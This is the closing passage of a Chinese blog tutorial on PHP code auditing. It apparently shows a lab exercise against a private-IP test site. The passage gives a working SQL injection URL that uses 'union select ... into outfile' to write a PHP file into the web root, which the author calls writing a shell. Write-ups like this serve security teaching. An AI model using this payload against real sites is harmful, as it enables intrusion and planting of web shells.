主页 > 网络知识 > PHP代码审计之入门实战(8)

PHP代码审计之入门实战(8)

 

1579754352182.jpg

 

获取到网站的物理路径为:

C:phpStudyPHPTutorialWWW

OK,那么可以直接开始写shell了:

http://10.211.55.12/?/search/index.html/key-%27union select 1,2,'<?php phpinfo();?>' into outfile 'C:\phpStudy\PHPTutorial\WWW\gg.php'%20%23/

shell写入目录为网站根目录下,文件名为gg.php

 

15797700065507.jpg

 

总结

因为第一次做审计,所以写的比较啰嗦了,日后再审计其他系统的分析文章的话 会尽量简洁明了的。

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!